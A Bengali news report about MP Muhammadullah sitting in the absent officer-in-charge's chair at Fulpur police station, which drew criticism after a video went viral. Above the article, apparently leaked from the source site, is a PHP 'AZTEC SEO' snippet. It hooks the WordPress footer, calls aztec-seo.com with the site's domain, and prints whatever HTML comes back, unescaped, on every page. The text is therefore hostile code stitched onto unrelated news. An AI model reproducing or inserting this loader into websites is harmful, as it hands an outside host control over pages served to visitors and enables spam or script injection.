/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ময়মনসিংহের ফুলপুর থানার ওসির চেয়ারে এমপি মুহাম্মাদুল্লাহ বসে আইনশৃঙ্খলা নিয়ে দিক-নির্দেশনা দিচ্ছেন; আর টেবিলের সামনে থানার পুলিশ সদস্যরা কেউ বসে, কেউ দাঁড়িয়ে আছেন।
স্থানীয় এমপির এমন একটি ভিডিও ও ছবি সামাজিক যোগাযোগমাধ্যম ফেসবুকে ভাইরাল হয়েছে। গত কয়েক দিন ধরে এ নিয়ে চলছে নানা আলোচনা-সমালোচনার ঝড়।
ওসির চেয়ারে বসার বিষয়ে ময়মনসিংহ-২ (ফুলপুর-তারাকান্দা) আসনের সংসদ সদস্য মুহাম্মাদুল্লাহ সাংবাদিকদের জানান, সকালে আকস্মিকভাবে ফুলপুর থানা পরিদর্শনে আসি। থানার ভারপ্রাপ্ত কর্মকর্তা না থাকায় কর্মরত পুলিশ সদস্যরা আমাকে ওই চেয়ারে বসান। এ সময় আমি ফুলপুর উপজেলার সার্বিক আইনশৃঙ্খলা পরিস্থিতি ও পুলিশের সেবা নিয়ে উপস্থিত পুলিশ সদস্যদের সঙ্গে কথা বলি, মতবিনিময় করি। ওসির চেয়ারে বসা আমার অপরাধ হয়েছে কিনা জানি না। তবে এখানকার পুলিশ সদস্যরা আমাকে ওখানে বসিয়েছেন।
এদিকে ফুলপুর থানার ওসি মো. রাশেদুল হাসান রাশেদ জানান, ময়মনসিংহ পুলিশ লাইনে প্যারেড থাকায় ওই দিন সকাল সোয়া ৭টায় ফুলপুর থেকে ময়মনসিংহে চলে আসি; কিন্তু এমপি সাহেব সকাল ১০টায় হঠাৎ করেই থানায় হাজির হন। এরপর থানায় কর্মরত পুলিশ সদস্যদের সঙ্গে মতবিনিময় করেন এবং খোঁজখবর নেন।
তিনি আরও জানান, ওই দিন সংসদ সদস্য থানায় আসার কোনো রুটিন ছিল না বা আমাকে আগে থেকে কিছু জানাননি তিনি। এমপির গাড়ি থানা প্রাঙ্গণে ঢোকার পর তাকে জানানো হয়।
সূত্র জানায়, গত ৫ এপ্রিল ফুলপুর থানার ওসি মো. রাশেদুল হাসান রাশেদ ময়মনসিংহ পুলিশ লাইনে প্যারেড থাকায় সকাল সোয়া ৭টায় ফুলপুর থেকে ময়মনসিংহ চলে আসেন। এরপর সকাল ১০টায় আকস্মিকভাবে থানায় উপস্থিত হন এমপি মুহাম্মাদুল্লাহ। পরে তিনি ওসির চেয়ারের পাশে ফাঁকা চেয়ার থাকা সত্ত্বেও ওসির চেয়ারে গিয়ে বসেন। এ সময় থানায় কর্মরত পুলিশ সদস্যদের সঙ্গে উপজেলার সার্বিক আইনশৃঙ্খলা পরিস্থিতি ও জনগণের সেবার মান নিয়ে কিছুক্ষণ মতবিনিময় করে চলে যান।
এরপর ওসির চেয়ারে এমপি বসার ভিডিওটি ফেসবুকে ছড়িয়ে পড়ে।
ভাইরাল হওয়া ভিডিওতে দেখা যায়, ওসির চেয়ারে সংসদ সদস্য মুহাম্মাদুল্লাহ বসে আছেন। তার সামনে ও পাশে দাঁড়িয়ে ও বসে ছিলেন থানার অন্যান্য পুলিশ কর্মকর্তারা ও এমপির দুই কর্মী। এ সময় ওসির চেয়ারে বসে পুলিশ কর্মকর্তাদের দিক-নির্দেশন দিতে দেখা যায় এমপিকে।
উল্লেখ্য, ময়মনসিংহ-২ (ফুলপুর-তারাকান্দা) আসন থেকে ত্রয়োদশ জাতীয় সংসদ নির্বাচনে বিএনপির ধানের শীষের প্রার্থী মোতাহার হোসেন তালুকদারকে হারিয়ে বাংলাদেশ খেলাফত মজলিসের রিকশা প্রতীকের প্রার্থী মুহাম্মাদুল্লাহ জয়ী হন।